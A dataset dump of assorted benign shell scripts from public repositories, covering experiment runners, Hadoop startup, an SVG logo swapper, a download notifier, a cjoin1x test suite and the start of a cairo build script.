blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
dd6c19cfd6d164fbfe21264f109b3f95483773e2
|
Shell
|
tkusmierczyk/badges
|
/src/experiments/RUN_ALL_EXPERIMENTS.sh
|
UTF-8
| 2,739
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/bash
#Input and output directory
DIR="../../data/badges/"
#Sliding window size
WIN="60"
#Badge introduction time - Tag Wiki Edits
TAGEDIT_BADGE="756"
#Badge introduction time - bounties
BOUNTY_BADGE="703.5"
#############################################################
echo "CALCULATING SLIDING WINDOW TEST STATISTICS"
CPUS=3 #How many cores to use
PARAMS="-p fitting_mode=3 -c $CPUS"
python sliding_window.py $PARAMS -i $DIR/tagedits/tageditor.tsv -o $DIR/tagedits/tageditor_w${WIN}_fitting.tsv -z 690 -e 900 -w $WIN -m 5 -s 1 -b $TAGEDIT_BADGE
python sliding_window.py $PARAMS -i $DIR/bounties/bounty1.tsv -o $DIR/bounties/bounty1_w${WIN}_fitting.tsv -z 500 -e 1500 -w $WIN -m 5 -s 1 -b $BOUNTY_BADGE
python sliding_window.py $PARAMS -i $DIR/bounties/bounty2.tsv -o $DIR/bounties/bounty2_w${WIN}_fitting.tsv -z 500 -e 1500 -w $WIN -m 5 -s 1 -b $BOUNTY_BADGE
#############################################################
echo "EXTRACTION OF USERS APPEARING IN EACH SLIDING WINDOW"
python sliding_window_extract_users.py $PARAMS -i $DIR/tagedits/tageditor.tsv -o $DIR/tagedits/tageditor_w${WIN}_users.tsv -z 690 -e 900 -w $WIN -m 5 -s 1 -b $TAGEDIT_BADGE
python sliding_window_extract_users.py $PARAMS -i $DIR/bounties/bounty1.tsv -o $DIR/bounties/bounty1_w${WIN}_users.tsv -z 500 -e 1500 -w $WIN -m 5 -s 1 -b $BOUNTY_BADGE
python sliding_window_extract_users.py $PARAMS -i $DIR/bounties/bounty2.tsv -o $DIR/bounties/bounty2_w${WIN}_users.tsv -z 500 -e 1500 -w $WIN -m 5 -s 1 -b $BOUNTY_BADGE
#############################################################
echo "PLOTTING SLIDING WINDOW RESULTS"
python sliding_window_plot.py -z 720 -e 840 -i $DIR/tagedits/tageditor_w${WIN}_fitting.tsv -b $TAGEDIT_BADGE -l "Tag Editor intro" -p "title=,legend=t,xlabel=sliding window center [days],ylabel=p-value,xmin=720,xmax=840,ymax=0.0015,smoothing=5,smoothing_mode=1,bw=0.1"
python sliding_window_plot.py -i $DIR/bounties/bounty1_w${WIN}_fitting.tsv -b $BOUNTY_BADGE -l "Promoter intro" -p "title=,legend=t,xlabel=sliding window center [days],ylabel=p-value,xmax=1000,xmin=650,ymax=0.005,bw=0.6,smoothing=5,smoothing_mode=1"
python sliding_window_plot.py -i $DIR/bounties/bounty2_w${WIN}_fitting.tsv -b $BOUNTY_BADGE -l "Investor intro" -p "title=,legend=t,xlabel=sliding window center [days],ylabel=p-value,xmax=1000,xmin=650,ymax=0.001,bw=0.2,smoothing=5,smoothing_mode=1"
#############################################################
echo "VALIDATING SMD SCORES"
python sliding_window_extract_users_smd.py -i $DIR/tagedits/tageditor_w${WIN}_users.tsv
python sliding_window_extract_users_smd.py -i $DIR/bounties/bounty1_w${WIN}_users.tsv
python sliding_window_extract_users_smd.py -i $DIR/bounties/bounty2_w${WIN}_users.tsv
| true
|
49ddcf35d54f447524f9969257c2d8fa7d3ffcee
|
Shell
|
usp-engineers-community/Open-usp-Tukubai
|
/TEST/cjoin1x.test
|
UTF-8
| 11,811
| 3.96875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#!/usr/local/bin/bash -xv # コマンド処理系の変更例
#
# test script of cjoin1x
#
# usage: [<test-path>/]calclock.test [<command-path> [<python-version>]]
#
# <test-path>は
# 「現ディレクトリーからみた」本スクリプトの相対パス
# または本スクリプトの完全パス
# 省略時は現ディレクトリーを仮定する
# <command-path>は
# 「本スクリプトのディレクトリーからみた」test対象コマンドの相対パス
# またはtest対象コマンドの完全パス
# 省略時は本スクリプトと同じディレクトリーを仮定する
# 値があるときまたは空値("")で省略を示したときはあとにつづく<python-version>を指定できる
# <python-version>は
# 使用するpython処理系のversion(minor versionまで指定可)を指定する
# (例 python2 python2.6 phthon3 python3.4など)
# 単にpythonとしたときは現実行環境下でのdefault versionのpythonを使用する
# 文字列"python"は大文字/小文字の区別をしない
# 省略時はpythonを仮定する
name=cjoin1x # test対象コマンドの名前
testpath=$(dirname $0) # 本スクリプト実行コマンドの先頭部($0)から本スクリプトのディレトリー名をとりだす
cd $testpath # 本スクリプトのあるディレクトリーへ移動
if test "$2" = ""; # <python-version>($2)がなければ
then pythonversion="python" # default versionのpythonとする
else pythonversion="$2" # <python-version>($2)があれば指定versionのpythonとする
fi
if test "$1" = ""; # <command-path>($1)がなければ
then commandpath="." # test対象コマンドは現ディレクトリーにある
else commandpath="$1" # <command-path>($1)があればtest対象コマンドは指定のディレクトリーにある
fi
com="${pythonversion} ${commandpath}/${name}" # python処理系によるtest対象コマンド実行の先頭部
tmp=$(mktemp)
ERROR_CHECK(){
[ "$(echo ${PIPESTATUS[@]} | tr -d ' 0')" = "" ] && return
echo $1
echo "${pythonversion} ${name}" NG
rm -f $tmp-*
exit 1
}
BOMandEOLvariation(){ # BOM無しLF改行ファイル($1)からBOM付きCRLF改行ファイル($2)とBOM付きCR改行ファイル($3)を生成する
[ $# -eq 3 ]; ERROR_CHECK "TESTスクリプト内のBOMandEOLvariation()でファイル指定が不正"
awk '{print '\xEF\xBB\xBF' $0}' $1 > $2 # $1の先頭にBOMを付け全行をCRLFで連接し終端にCRを付加して$2に出力
awk 'BEGIN {ORS = "\r"} {print '\xEF\xBB\xBF' $0}' $1 > $3 # $1の先頭にBOMを付け全行をCRで連接して$3に出力し$3最終行のLFをCRに変換
}
###########################################
# TEST1
# 通常の連結
# 行頭/行末の空白削除と行中の連続空白の単空白化
cat << FIN > $tmp-master
1 東京1
1 東京2
2 大阪1
2 大阪2
FIN
cat << FIN > $tmp-tran
3 栄
2 京橋
3 金山
1 上野
1 新宿
4 天神
2 難波
3 熱田
2 梅田
4 博多
FIN
cat << FIN > $tmp-ans
2 大阪1 京橋
2 大阪2 京橋
1 東京1 上野
1 東京2 上野
1 東京1 新宿
1 東京2 新宿
2 大阪1 難波
2 大阪2 難波
2 大阪1 梅田
2 大阪2 梅田
FIN
${com} key=1 $tmp-master $tmp-tran >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST1-1 error"
# master/tranの各行において行頭/行末の空白は削除され 行中の連続空白は単空白に変換される
cat << FIN > $tmp-master
1 東京1
1 東京2
2 大阪1
2 大阪2
FIN
cat << FIN > $tmp-tran
3 栄
2 京橋
3 金山
1 上野
1 新宿
4 天神
2 難波
3 熱田
2 梅田
4 博多
FIN
${com} key=1 $tmp-master $tmp-tran >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST1-2 error"
###########################################
# TEST2
cat << FIN > $tmp-ng-ans
3 栄
3 金山
4 天神
3 熱田
4 博多
FIN
# ngオプションを使ってマッチしないレコードをファイルディスクリプター指定をして出力します。
${com} +ng3 key=1 $tmp-master $tmp-tran > $tmp-ok-out 3> $tmp-ng-out
diff $tmp-ng-ans $tmp-ng-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST2-1 error"
# ngオプションでファイルディスクリプター指定を省略すると、マッチしないレコードは標準エラー出力へ出力します。
${com} +ng key=1 $tmp-master $tmp-tran > $tmp-ok-out 2> $tmp-ng-out
diff $tmp-ng-ans $tmp-ng-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST2-2 error"
###########################################
# TEST3
# 連続するキーフィールドを指定して連結
cat << FIN > $tmp-master
A A nameA1
A A nameA2
A B nameAB
FIN
cat << FIN > $tmp-tran
x x B A x x
x x A B x x
x x A A x x
FIN
cat << FIN > $tmp-ans
x x A B nameAB x x
x x A A nameA1 x x
x x A A nameA2 x x
FIN
${com} key=3/4 $tmp-master $tmp-tran > $tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST3 error"
###########################################
# TEST4
# 離れたキーフィールドの場合(通常は使用しません)
cat << FIN > $tmp-master
B a A nameA1
B b A nameA2
C c A nameAC
FIN
cat << FIN > $tmp-tran
x A w B x
x C x A x
x B y C x
x B z A x
FIN
cat << FIN > $tmp-ans
x C x A c nameAC x
x B z A a nameA1 x
x B z A b nameA2 x
FIN
${com} key=4@2 $tmp-master $tmp-tran > $tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST4 error"
###########################################
# TEST5
# 離れたキーフィールドの場合(通常は使用しません)←3フィールド
cat << FIN > $tmp-master
x B a A nameA1
x B b A nameA2
x C c A nameAC
FIN
cat << FIN > $tmp-tran
x A w B x
x C x A x
x B y C x
x B z A x
FIN
cat << FIN > $tmp-ans
x C x A c nameAC x
x B z A a nameA1 x
x B z A b nameA2 x
FIN
${com} key=4@1@2 $tmp-master $tmp-tran > $tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST5 error"
###########################################
#TEST6
# キーリストの重複解消試験(1)←3フィールドの重複解消
cat << FIN > $tmp-master
B a A nameA1
B b A nameA2
C c A nameAC
FIN
cat << FIN > $tmp-tran
x A w B x
x C x A x
x B y C x
x B z A x
FIN
cat << FIN > $tmp-ans
x C x A c nameAC x
x B z A a nameA1 x
x B z A b nameA2 x
FIN
${com} key=4@2@2@4@4@2 $tmp-master $tmp-tran > $tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST6 error"
###########################################
# TEST7
# キーリストの重複解消試験(2)←2フィールドの重複解消
cat << FIN > $tmp-master
x B a A nameA1
x B b A nameA2
x C c A nameAC
FIN
cat << FIN > $tmp-ans
x C x A c nameAC x
x B z A a nameA1 x
x B z A b nameA2 x
FIN
${com} key=4@1@2@1@2@4 $tmp-master $tmp-tran > $tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST7 error"
###########################################
# TEST8
# キーフィールドの列挙指定と範囲指定の連続混用および重複指定解消の試験
# キーフィールドの指定に絶対位置指定とNF相対位置指定を混在させた場合は
# tranのフィールド数は固定でなければならない
cat << FIN > $tmp-master
A A nameA1
A A nameA2
A B nameAB
FIN
cat << FIN > $tmp-tran
x x B A x x
x x A B x x
x x A A x x
FIN
cat << FIN > $tmp-ans
x x A B nameAB x x
x x A A nameA1 x x
x x A A nameA2 x x
FIN
${com} key=3/4@4@3@NF-3/NF-2@4/3 $tmp-master $tmp-tran > $tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST8 error"
###########################################
# TEST9
# TEST1の拡大版
# BOM付きCRLFとBOM付きCRの試験
# 通常の連結
cat << FIN > $tmp-master
1 東京1
1 東京2
2 大阪1
2 大阪2
FIN
cat << FIN > $tmp-tran
3 栄
2 京橋
3 金山
1 上野
1 新宿
4 天神
2 難波
3 熱田
2 梅田
4 博多
FIN
cat << FIN > $tmp-ans
2 大阪1 京橋
2 大阪2 京橋
1 東京1 上野
1 東京2 上野
1 東京1 新宿
1 東京2 新宿
2 大阪1 難波
2 大阪2 難波
2 大阪1 梅田
2 大阪2 梅田
FIN
# 入力用tmpファイルからBOM付きCRLFとBOM付きCRの各ファイルを作る
BOMandEOLvariation $tmp-master $tmp-masterBOMCRLF $tmp-masterBOMCR
BOMandEOLvariation $tmp-tran $tmp-tranBOMCRLF $tmp-tranBOMCR
# BOM付きCRLF
${com} key=1 $tmp-masterBOMCRLF $tmp-tranBOMCRLF >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST9-1 error"
# BOM付きCR
${com} key=1 $tmp-masterBOMCR $tmp-tranBOMCR >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST9-2 error"
# pipe接続 master
# BOM付きCRLF
cat $tmp-masterBOMCRLF | ${com} key=1 - $tmp-tranBOMCRLF >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST9-3 error"
# BOM付きCR
cat $tmp-masterBOMCR | ${com} key=1 - $tmp-tranBOMCR >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST9-4 error"
# pipe接続 tran
# BOM付きCRLF
cat $tmp-tranBOMCRLF | ${com} key=1 $tmp-masterBOMCRLF - >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST9-5 error"
# BOM付きCR
cat $tmp-tranBOMCR | ${com} key=1 $tmp-masterBOMCR - >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST9-6 error"
###########################################
# TEST10
# key指定に絶対位置指定とNF相対位置指定を混在させない場合は
# tranのフィールド数は一定でなくてもよい
# TEST10-1
# tranの後尾の欄をNF相対位置指定でkeyとし
# tranのフィールド数が変化するときの試験
cat << FIN > $tmp-master
1 東京1
1 東京2
2 大阪1
2 大阪2
FIN
cat << FIN > $tmp-tran
栄 a 3
京橋 b x 2
金山 c 3
上野 d 1
新宿 e y z 1
天神 f 4
難波 g 2
熱田 h 3
梅田 i 2
博多 j 4
FIN
cat << FIN > $tmp-ans
京橋 b x 2 大阪1
京橋 b x 2 大阪2
上野 d 1 東京1
上野 d 1 東京2
新宿 e y z 1 東京1
新宿 e y z 1 東京2
難波 g 2 大阪1
難波 g 2 大阪2
梅田 i 2 大阪1
梅田 i 2 大阪2
FIN
${com} key=NF $tmp-master $tmp-tran >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST10-1 error"
# key指定に絶対位置指定とNF相対位置指定を混在させた場合の試験
# TEST10-2
# tranの先頭と後尾の欄をkeyとし
# tranのフィールド数が一定であるとき
cat << FIN > $tmp-master
1 東京1 A 10 X Y
1 東京2 B 20 Z P
1 東京3 D 20 F Q
1 東京4 G 30 I V
2 大阪1 J 10 R b
2 大阪2 O 10 S c
2 大阪3 K 20 T d
2 大阪4 M 20 U e
FIN
cat << FIN > $tmp-tran
3 栄 a 30
2 京橋 b 20
3 金山 c 30
1 上野 d 10
1 新宿 e 20
4 天神 f 40
2 難波 g 20
3 熱田 h 30
2 梅田 i 20
4 博多 j 40
FIN
cat << FIN > $tmp-ans
2 京橋 b 20 大阪3 K T d
2 京橋 b 20 大阪4 M U e
1 上野 d 10 東京1 A X Y
1 新宿 e 20 東京2 B Z P
1 新宿 e 20 東京3 D F Q
2 難波 g 20 大阪3 K T d
2 難波 g 20 大阪4 M U e
2 梅田 i 20 大阪3 K T d
2 梅田 i 20 大阪4 M U e
FIN
${com} key=1@NF $tmp-master $tmp-tran >$tmp-out
diff $tmp-ans $tmp-out
[ $? -eq 0 ] ; ERROR_CHECK "TEST10-2 error"
# TEST10-3
# tranの先頭と後尾の欄をkeyとし
# tranのフィールド数を変化させたとき
cat << FIN > $tmp-tran
3 栄 a 30
2 京橋 b 20 40
3 金山 c 30
1 上野 d 10
1 新宿 e 20
4 天神 f 40
2 難波 g 20
3 熱田 h 30
2 梅田 i 20
4 博多 j 40
FIN
# ${name}のTEST10-3では
# 「key指定において絶対欄位置とNF相対欄位置が混在している状態でtranのフィールド数が変化する」例を実行し、
# エラーメッセージが出るように設定されている
${com} key=1@NF $tmp-master $tmp-tran >$tmp-out 2> /dev/null
[ $? -ne 0 ] ; ERROR_CHECK "TEST10-3 error"
###########################################
rm -f $tmp-*
echo "${pythonversion} ${name}" OK
exit 0
| true
|
3a9ad75b00cc694b15b9c177ff9b37e2db58a04d
|
Shell
|
adamgibbins/bin
|
/urlencode
|
UTF-8
| 313
| 3.296875
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env zsh
if [[ $# = 0 ]] ; then
echo "Usage: $0 url"
echo "Example: $0 http://www.example.com/test/path?with=some&foo=bar"
echo "Encode a URL."
else
# RFC 2396
setopt extendedglob
input=( ${(s::)1} )
print ${(j::)input/(#b)([^A-Za-z0-9_.!~*\'\(\)-])/%${(l:2::0:)$(([##16]#match))}}
fi
| true
|
9b2ee213c699c23357d979cfb2fd444d85ed7cfa
|
Shell
|
cremadesign/cdn
|
/mwg/make-orgchart
|
UTF-8
| 5,313
| 3.078125
| 3
|
[] |
no_license
|
#! /usr/bin/env bash
. ~/.bash_profile
# -----
# Org Chart Compiler
# Created by Stephen Ginn
# Modified 2018-11-01
# This script replaces Illustrator-exported <rect> elements with images and links.
# -----
# Check for and Install Missing Dependencies
# NOTE: The RSVG delegate is better at converting the shapes / lines,
# but is ignoring linked svg files.
# brew install imagemagick --with-librsvg
# convert -size 1640x1640 orgchart-linked.svg test.png
source="orgchart-source.svg"
dest="orgchart-linked.svg"
destname=$(basename "$dest" .svg)
tabs 7; tab2=" ";
# This function replaces each placeholder box with the appropriate logo.
logoswap () {
line="$1"
website="" # optional
if [[ $line == *'<rect id="amf-holdings"'* ]]; then
image_id="amf-holdings"
image_path="partners/holdings/amf-holdings-black.svgz"
elif [[ $line == *'<rect id="amfirst"'* ]]; then
image_id="amfirst"
image_path="partners/amfirst/color.svgz"
website="https://www.amfirstinsco.com"
elif [[ $line == *'<rect id="new-providence-life"'* ]]; then
image_id="new-providence-life"
image_path="partners/npl/color.svgz"
website="https://newprovidencelife.com"
elif [[ $line == *'<rect id="oic-holdings"'* ]]; then
image_id="oic-holdings"
image_path="partners/holdings/oic-holdings-black.svgz"
elif [[ $line == *'<rect id="amfirst-ltd"'* ]]; then
image_id="amfirst-ltd"
image_path="partners/amfirst-ltd/color.svgz"
elif [[ $line == *'<rect id="info-lockbox"'* ]]; then
image_id="info-lockbox"
image_path="partners/lockbox/info-black.svgz"
website="https://insurancelockbox.com"
elif [[ $line == *'<rect id="amf-services"'* ]]; then
image_id="amf-services"
image_path="partners/holdings/amf-services-black.svgz"
elif [[ $line == *'<rect id="amfirst-life"'* ]]; then
image_id="amfirst-life"
image_path="partners/amfirst-life/center-color.svgz"
website="https://amfirstlife.com"
elif [[ $line == *'<rect id="monitor-life"'* ]]; then
image_id="monitor-life"
image_path="partners/monitor-life/color.svgz"
website="https://monitorlife.com"
elif [[ $line == *'<rect id="london-america"'* ]]; then
image_id="london-america"
image_path="partners/london-america/color.svgz"
elif [[ $line == *'<rect id="tpm-life"'* ]]; then
image_id="tpm-life"
image_path="partners/tpm/color.svgz"
website="https://tpmins.com"
elif [[ $line == *'<rect id="amfirst-specialty"'* ]]; then
image_id="amfirst-specialty"
image_path="partners/amfirst-specialty/color.svgz"
elif [[ $line == *'<rect id="afic-administrators"'* ]]; then
image_id="afic-administrators"
image_path="partners/holdings/afic-administrators-black.svgz"
elif [[ $line == *'<rect id="amfirst-capital"'* ]]; then
image_id="amfirst-capital"
image_path="partners/amfirst-capital/color.svgz"
elif [[ $line == *'<rect id="amfirst-holdings"'* ]]; then
# Org Chart Title
image_id="amfirst-holdings"
image_path="partners/amfirst-holdings/black.svgz"
fi
image_url="https://cdn.cremadesignstudio.com/mwg/$image_path"
if [[ $website != "" ]]; then
echo "${tab2}<a href=\"$website\" target=\"_blank\">"
echo "${tab2}$line" | sed "s|<rect id=\"$image_id\"|<image xlink:href=\"$image_url\"|g" | sed "s| opacity=\"0.15\"| |g"
echo "${tab2}</a>"
else
echo "$line" | sed "s|<rect id=\"$image_id\"|<image xlink:href=\"$image_url\"|g" | sed "s| opacity=\"0.15\"| |g"
fi
}
alert -t info "Removing Old Exports..."
rm "$dest"
rm "$destname.min.svg"
rm "$destname.min.svgz"
alert -t info "Making Org Chart..."
IFS=''
while read -r line; do
if [[ $line == *"<svg"* ]]; then
newline="$(echo "$line" | sed "s|<svg|<svg version=\"1.1\" xml:space=\"preserve\" xmlns:xlink=\"http://www.w3.org/1999/xlink\"|g")
<defs>
<style>
.fill-black path {fill:#333;}
line,polyline {stroke:#333; fill:none;}
text, foreignObject {
font-family:'Roboto-Regular','Helvetica Neue', Arial, sans-serif;
font-size: 9.5px;
text-align: center;
}
foreignObject p {margin:0;}
a:hover {cursor: pointer;}
</style>
</defs>"
elif [[ $line == *'<line x1='* ]]; then
newline="$(echo "$line" | sed "s| fill=\"none\" stroke=\"#000\"||g")"
elif [[ $line == *'<polyline points='* ]]; then
newline="$(echo "$line" | sed "s| fill=\"none\" stroke=\"#000\"||g")"
elif [[ $line == *'<text transform='* ]]; then
newline="$(echo "$line" | sed "s| font-size=\"9\" font-family=\"SFProText-Regular, SF Pro Text\"||g")"
elif [[ $line == *'<rect id='* ]]; then
newline="$(logoswap "$line")"
else
newline="$line"
fi
# Print to Destination
echo -e "$newline" >> $dest
done < $source
alert -t info "Exporting SVG and SVGZ Files..."
svgo --disable=mergePaths --disable=convertShapeToPath "$dest" -o "$destname.min.svg"
svgo --disable=mergePaths --disable=convertShapeToPath "$dest" -o - | gzip -cfq9 > "$destname.min.svgz"
alert -t info "Removing Source File..."
# rm "$source"
exit;
| true
|
570b644b2513532d8272149960cfa2230c6454ab
|
Shell
|
lelis-research/PyGames-synthesis
|
/bin/gather_paths_by_config.sh
|
UTF-8
| 1,007
| 3.859375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# This script gathers the paths to the .dat files with the given
# configuration name.
#
# If multiple runs were performed in a SINGLE process, the .dat file
# has "run" prefixing the actual run index. For example:
#
# best_scores_run5_Catcher_sa_no_opt_data.dat
#
# else the .dat file's name should not contain the prefix and the
# name of game comes before the run index. For instance:
#
# best_scores_Catcher_5_sa_no_opt_data.dat
#
# This is to differentiate searches done in different processes/jobs from those
# those done in a single process/job.
#
config=$1
total_runs=$2
game=$3
was_single_process=$4
paths_file=${config}_paths
touch $paths_file
rm ${paths_file}
echo "# ${config}" >> ${paths_file}
for ((i=0; i < $total_runs; i++)) {
if [ -z "$was_single_process" ]
then
echo "best_scores_${game}_${i}_${config}_data.dat" >> ${paths_file}
else
echo "best_scores_run${i}_${game}__${config}_data.dat" >> ${paths_file}
fi
}
| true
|
6a2ba417df7714bd7fe780f03b6f772c2fa87de5
|
Shell
|
shengchen-liu/yt8m
|
/ensemble/model_selection_scripts/extend-step-mean_model.sh
|
UTF-8
| 742
| 2.984375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
model_name="$1"
candidates_conf="$2"
train_path=/Youtube-8M/model_predictions_for_selection/ensemble_train
model_path="${DIR}/../../model/${model_name}"
all_models_conf="${model_path}/all_models.conf"
for candidates in $(cat $candidates_conf); do
echo "$candidates"
train_data_patterns=$(python ${DIR}/get_patterns.py --train_path="$train_path" --candidates="$candidates")
CUDA_VISIBLE_DEVICES=1 python ${DIR}/../eval.py \
--model_checkpoint_path="${model_path}/model.ckpt-0" \
--train_dir="${model_path}" \
--model="MeanModel" \
--echo_gap=True \
--batch_size=1024 \
--eval_data_patterns="$train_data_patterns" | tail -n 1
done
| true
|
e6911cce833b9282bdcab29f295107e243e14fc9
|
Shell
|
FHead/PhysicsHIJetReco2018
|
/CommonCode/script/CombineResult.sh
|
UTF-8
| 493
| 3.984375
| 4
|
[] |
no_license
|
ResultDirectory=$1
CombinedDirectory=$2
if [ -z $1 ]
then
echo "[Notice] Please specify the directory where the individual results are in!"
exit
fi
if [ -z $2 ]
then
echo "[Notice] Using default combined folder name: CombinedResult"
CombinedDirectory=CombinedResult
fi
mkdir -p $CombinedDirectory
for i in `ls $ResultDirectory | grep root$ | rev | cut -d '_' -f 2- | rev | sort | uniq`
do
hadd -f -k $CombinedDirectory/${i}.root $ResultDirectory/${i}_[0-9]*.root
done
| true
|
87b94fc2d657c912888cf1b7ab88dfb472748f6f
|
Shell
|
gregolsky/captain-sparrow
|
/docker/compose/assets/notify.sh
|
UTF-8
| 405
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/bash
MESSAGE_TITLE="Download completed"
MESSAGE_CONTENT="$TR_TORRENT_NAME"
echo "Notifying on download complete $TR_TORRENT_NAME"
curl -Ss \
-H "Access-Token: $PUSHBULLET_API_KEY" \
-H 'Content-Type: application/json' \
-X POST \
--data-binary "{ \"type\": \"note\", \"body\": \"$TR_TORRENT_NAME\", \"title\": \"Download completed\" }" \
https://api.pushbullet.com/v2/pushes
| true
|
981a9c03188793265046c473d649252695afc503
|
Shell
|
veltzer/demos-bash
|
/src/examples/core/logical_operators/using_bracket.bash
|
UTF-8
| 1,010
| 3.578125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash -u
# This example shows how to use logical operators when using the '['/'test' shell builtin.
# Note that '[' and '[[' are not the same as '[[' is a shell keyword and not a shell
# builtin and behaves differently.
# Also note that GNU in it's coreutils has a process implementation of both '[' and 'test'
# but these are not usually used as the shell builtins are preferred by bash.
# Notes:
# - if you want to see the documentation of '['/'test' *dont do 'man ['*. Instead
# look at man builtins and look for 'test'.
# - if you wish to do logical operators combined with '[' you must use -a, -o and more.
if [ 'foo' = 'foo' ]
then
true
else
error ${LINENO} "problem" 1
fi
if [ 'foo' != 'bar' ]
then
true
else
error ${LINENO} "problem" 1
fi
if [ 2 != 3 ] && [ 3 != 4 ]
then
true
else
error ${LINENO} "problem" 1
fi
let "a=2"
let "b=2"
if [ $a = 1 ] || [ $b = 2 ]
then
true
else
error ${LINENO} "problem" 1
fi
if [ $a = 2 ] && [ $b = 2 ]
then
true
else
error ${LINENO} "problem" 1
fi
| true
|
66369d265357aea03c0df6048ba4c312d7ad171d
|
Shell
|
KonecKonca/data201FullReport
|
/hadoopHA/1_ha/ha-hdfs/namenode/run.sh
|
UTF-8
| 1,871
| 3.984375
| 4
|
[] |
no_license
|
#!/bin/bash
namedir=`echo ${HDFS_CONF_dfs_namenode_name_dir}`
source ~/.bashrc
if [ -z "${CLUSTER_NAME}" ]; then
echo "Cluster name not specified"
exit 2
fi
function waitUntilJournalNodeAvailable() {
local host=$1
until $(curl --output /dev/null --silent --head --fail http://${host}:8480); do
echo " >> Journal node ${host} not available, waiting for 5 more seconds"
sleep 5
done
}
echo "WAITING UNTIL for journal nodes to become available..."
waitUntilJournalNodeAvailable ${JOURNAL_NODE_1}
waitUntilJournalNodeAvailable ${JOURNAL_NODE_2}
waitUntilJournalNodeAvailable ${JOURNAL_NODE_3}
if [[ ! -z "${IS_STANDBY_NODE}" ]]; then
echo "Formatiting and starting failover controller"
${HADOOP_PREFIX}/bin/hdfs zkfc -formatZK -force -nonInteractive
${HADOOP_PREFIX}/bin/hdfs --config ${HADOOP_CONF_DIR} --daemon start zkfc
echo "Starting StandBy NameNode..."
${HADOOP_PREFIX}/bin/hdfs --config ${HADOOP_CONF_DIR} namenode -bootstrapStandby -force
${HADOOP_PREFIX}/bin/hdfs --config ${HADOOP_CONF_DIR} namenode
echo "StandBy NameNode started!"
fi
if [[ ! -z "${IS_ACTIVE_NODE}" ]]; then
if [ "`ls -A $namedir`" == "" ]; then
echo "Formatting namenode name directory: $namedir"
${HADOOP_PREFIX}/bin/hdfs --config ${HADOOP_CONF_DIR} namenode -format ${CLUSTER_NAME} -force -nonInteractive
fi
echo "Formatiting and starting failover controller"
${HADOOP_PREFIX}/bin/hdfs zkfc -formatZK -force -nonInteractive
${HADOOP_PREFIX}/bin/hdfs --config ${HADOOP_CONF_DIR} --daemon start zkfc
echo "Starting Active NameNode..."
${HADOOP_PREFIX}/bin/hdfs --config ${HADOOP_CONF_DIR} namenode
echo "Active NameNode started!"
fi
if [[ -z "${IS_STANDBY_NODE}" ]] && [[ -z "${IS_ACTIVE_NODE}" ]]; then
echo "either IS_ACTIVE_NODE or IS_STANDBY_NODE env variable must be provided to identify NameNode state"
exit 2
fi
| true
|
d568e09b95eec39005a54faa8d61f49d4e026779
|
Shell
|
MenkeTechnologies/zpwr
|
/autoload/common/zpwrFzfDirSearch
|
UTF-8
| 385
| 2.71875
| 3
|
[
"MIT"
] |
permissive
|
# -*- mode: sh -*-
# vim: set ft=sh:
function zpwrFzfDirSearch(){
command find -L . -mindepth 1 \
\( -path '*/\\.*' -o -fstype 'sysfs' \
-o -fstype 'devfs' -o -fstype 'devtmpfs' \
-o -fstype 'proc' \) -prune -o -type d -print \
-o -type l -print 2> /dev/null | cut -c3- |
eval "$ZPWR_FZF --border $FZF_CTRL_T_OPTS"
}
zpwrFzfDirSearch "$@"
| true
|
f6961216cbc6ffde43ae8574743b87ca4bda5757
|
Shell
|
win-builds/slackware64-current
|
/l/cairo/cairo.SlackBuild
|
UTF-8
| 3,704
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/sh
# Copyright 2008, 2009, 2010, 2011, 2013 Patrick J. Volkerding, Sebeka, MN, USA
# All rights reserved.
#
# Redistribution and use of this script, with or without modification, is
# permitted provided that the following conditions are met:
#
# 1. Redistributions of this script must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
